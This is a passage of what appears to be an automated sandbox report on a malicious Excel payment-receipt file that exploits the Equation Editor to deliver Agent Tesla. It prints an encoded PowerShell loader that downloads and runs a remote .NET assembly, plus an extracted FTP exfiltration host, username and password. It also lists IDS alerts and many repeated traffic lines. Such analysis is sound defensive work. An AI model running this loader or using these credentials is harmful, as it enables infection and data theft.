NvJywgJyRwaXBvY28nLCAnJHBpcG9jbycsICdJbnN0YWxsVXRpbCcsICckcGlwb2NvJywgJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJyRwaXBvY28nLCckcGlwb2NvJywnJHBpcG9jbycsJzEnLCckcGlwb2NvJykpOw==';$alteastro = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($elar));Invoke-Expression $alteastro, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $elar = 'JGZsZWltb3NvID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdW5pY2VsdWxhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNvcmNvdmFkbyA9ICR1bmljZWx1bGFyLkRvd25sb2FkRGF0YSgkZmxlaW1vc28pOyRuZXRhbWVudGUgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkY29yY292YWRvKTskYmVpamFmbG9yID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRleHBsb3NpciA9ICc8PEJBU0U2NF9FTkQ+Pic7JGZhYmFnZWxsYSA9ICRuZXRhbWVudGUuSW5kZXhPZigkYmVpamFmbG9yKTskbXVuaGEgPSAkbmV0YW1lbnRlLkluZGV4T2YoJGV4cGxvc2lyKTskZmFiYWdlbGxhIC1nZSAwIC1hbmQgJG11bmhhIC1ndCAkZmFiYWdlbGxhOyRmYWJhZ2VsbGEgKz0gJGJlaWphZmxvci5MZW5ndGg7JGZvbG9zYSA9ICRtdW5oYSAtICRmYWJhZ2VsbGE7JGdlcm1pY2lkYSA9ICRuZXRhbWVudGUuU3Vic3RyaW5nKCRmYWJhZ2VsbGEsICRmb2xvc2EpOyRwZW5oYXNjb3NvID0gLWpvaW4gKCRnZXJtaWNpZGEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGdlcm1pY2lkYS5MZW5ndGgpXTskZGV0cmFjdGl2byA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHBlbmhhc2Nvc28pOyRjb3Jlb2dyYWZpYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGRldHJhY3Rpdm8pOyRib3RpbSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRib3RpbS5JbnZva2UoJG51bGwsIEAoJ3R4dC5
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Local\Temp\4kw4ewfk.izr.ps1
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-01T14:28:16.868476+010020204231Exploit Kit Activity Detected87.121.86.10580192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-01T14:27:54.415377+010020576351A Network Trojan was detected87.121.86.10580192.168.2.2249163TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-01T14:28:04.967788+010020490381A Network Trojan was detected142.215.209.77443192.168.2.2249162TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-01T14:27:54.415377+010028582951A Network Trojan was detected87.121.86.10580192.168.2.2249163TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Comprobante de pago.xlam.xlsxAvira: detected
                  Source: 8.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "biggiemma@horeca-bucuresti.ro", "Password": "e)rWKbKP8~mO"}
                  Source: Comprobante de pago.xlam.xlsxReversingLabs: Detection: 68%

                  Exploits

                  barindex
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 87.121.86.105 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000006.00000002.516217714.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000006.00000002.516217714.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000006.00000002.516217714.0000000000790000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035506DB ShellExecuteW,ExitProcess,2_2_035506DB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550632 LoadLibraryW,ShellExecuteW,ExitProcess,2_2_03550632
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035506AD URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035506AD
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550557 ExitProcess,2_2_03550557
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035506C6 ShellExecuteW,ExitProcess,2_2_035506C6
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03550700 ExitProcess,2_2_03550700
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: global trafficDNS query: name: 1016.filemail.com
                  Source: global trafficDNS query: name: 1016.filemail.com
                  Source: global trafficDNS query: name: 1016.filemail.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.121.86.105:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 142.215.209.77:443
